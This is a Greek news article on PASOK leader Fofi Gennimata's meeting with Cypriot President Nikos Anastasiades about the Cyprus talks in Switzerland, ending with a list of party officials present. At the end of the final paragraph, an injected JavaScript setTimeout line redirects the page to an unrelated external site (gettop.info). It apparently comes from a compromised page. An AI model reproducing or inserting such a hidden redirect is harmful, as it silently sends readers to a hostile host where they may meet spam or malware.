Γεννηματά σε Αναστασιάδη: Λύση χωρίς ρήτρες και δεσμεύσεις

0
6

 

Kατά τη συνάντησή της με τον Πρόεδρο της Κυπριακής Δημοκρατίας, Νίκο Αναστασιάδη, η πρόεδρος του ΠΑΣΟΚ Φώφη Γεννηματά επανέλαβε τη δεδομένη αμέριστη συμπαράσταση «στον Κυπριακό λαό και τις προσπάθειες της πολιτικής ηγεσίας για εξεύρεση μίας δίκαιης, βιώσιμης και λειτουργικής λύσης στα προβλήματα που δημιούργησε η τουρκική εισβολή».

Η κ. Γεννηματά ενημερώθηκε αναλυτικά από τον Πρόεδρο Αναστασιάδη, για το περιεχόμενο και την πορεία των συνομιλιών στην Ελβετία, ενώ έκανε λόγο για την ανάγκη «μιας λύσης που θα είναι σύμφωνη με το διεθνές δίκαιο και το ευρωπαϊκό κεκτημένο χωρίς ρήτρες και δεσμεύσεις, που θα είναι άδικες για τα δικαιώματα της πλειοψηφίας και μπορεί να οδηγήσουν σε δυσκολίες στη λειτουργία του ομοσπονδιακού σχήματος και σε αδιέξοδο».

Στη συνάντηση παρόντες ήταν ο υπεύθυνος του Τομέα Εξωτερικών Υποθέσεων και Άμυνας της ΚΟ της Δημοκρατικής Συμπαράταξης Ανδρέας Λοβέρδος, ο υπεύθυνος του Τομέα Ενέργειας, Περιβάλλοντος και Υποδομών της ΚΟ της Δημοκρατικής Συμπαράταξης Γιάννης Μανιάτης, η αν. γραμματέας Διεθνών Σχέσεων του ΠΑΣΟΚ Βασιλική Σουλαδάκη, ο διευθυντής του Πολιτικού Γραφείου της Προέδρου του ΠΑΣΟΚ Μανώλης Όθωνας και ο διευθυντής του Γραφείου Τύπου του ΠΑΣΟΚ Νίκος Βοσδογάνης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here